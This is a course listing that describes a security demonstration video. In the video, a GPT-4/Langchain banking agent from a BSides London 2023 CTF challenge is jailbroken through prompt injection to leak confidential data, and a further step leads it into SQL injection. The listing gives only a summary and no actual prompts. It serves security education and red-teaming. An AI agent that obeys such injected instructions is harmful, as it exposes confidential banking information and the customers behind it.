Prompt Injection and Jailbreaking Techniques for Banking LLM Agents - Security Demonstration

Overview

Learn how to identify and exploit vulnerabilities in AI systems through a detailed walkthrough of a LLM jailbreak/prompt injection challenge from BSides London 2023's CTF competition. Explore real-world security implications as the video demonstrates compromising a banking AI agent built with OpenAI's GPT-4 and Langchain, revealing methods to extract confidential information through prompt manipulation. Dive into advanced exploitation techniques, including an unsolved challenge component involving SQL injection exploitation through AI agent manipulation. Reference the Damn Vulnerable LLM Agent project and Synthetic Recollections publication to understand the technical framework and research behind these security vulnerabilities.

Syllabus

Prompt Injection / JailBreaking a Banking LLM Agent (GPT-4, Langchain)

Taught by

Donato Capitella

Reviews

Start your review of Prompt Injection and Jailbreaking Techniques for Banking LLM Agents - Security Demonstration

Taught by

Prompt Injection Attacks and Security in LLM-Powered Agents - ReAct and Langchain

LLM Pentesting: Mastering Security Testing for AI Models

Multi-Chain Prompt Injection and Jailbreaking in LLM Applications - Security Testing and Defense Strategies

Building LLM Applications Securely - Understanding Risks and Mitigation Strategies

Hacking and Securing LLM Applications - Understanding Browser Control Security Risks

Jailbreaking ChatGPT-Style Sandboxes - A Guide to Linguistic Hacks and Prompt Engineering

Never Stop Learning.